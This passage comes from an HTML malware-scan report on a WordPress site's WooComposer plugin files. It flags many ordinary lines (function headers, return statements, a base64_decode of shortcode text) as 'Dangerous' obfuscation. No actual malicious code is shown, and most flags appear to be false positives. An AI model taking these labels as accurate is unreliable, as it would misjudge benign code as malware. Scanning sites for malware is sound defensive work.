<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wc_print_notices'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'WooComposer_Single_'</span><span style="color: #007700">.</span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_266").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-single-style02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_267" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Single_style02</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_267").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/woocomposer_pagination.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.30 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_268" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_pagination</span><span style="color: #007700">(</span><span style="color: #0000BB">$pages </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$range </span><span style="color: #007700">= </span><span style="color: #0000BB">2</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_268").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_list.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_269" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">WooComposer_ViewList</span><span style="color: #007700">; } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_woocomposer_list </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_list_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 366</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_269").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-single-style01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.94 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_270" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Single_style01</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_270").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-loop-style03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.89 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_271" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Loop_style03</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$element</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_271").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-loop-style02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_272" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Loop_style02</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$element</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_272").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_grid.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.02 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_273" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'WooComposer_Loop_'</span><span style="color: #007700">.</span><span style="color: #0000BB">$product_style</span><span style="color: #007700">; </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #0000BB">$function</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #DD0000">'grid'</span><span style="color: #007700">); </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #DD0000">"\n</div>'; return </span><span style="color: #0000BB">$output</span><span style="color: #DD0000">; } } new WooComposer_GridView; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_grid_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wc_print_notices'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'WooComposer_Loop_'</span><span style="color: #007700">.</span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #DD0000">'grid'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_273").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_274" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #FF8000">//jQuery("[data-save=true]").trigger("click"); }); </script>'; return $output; } } new WooComposer_ViewCarousel; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Init_Carousel</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Carousel</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 470</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wc_print_notices'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'WooComposer_Loop_'</span><span style="color: #007700">.</span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #DD0000">'carousel'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 562</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
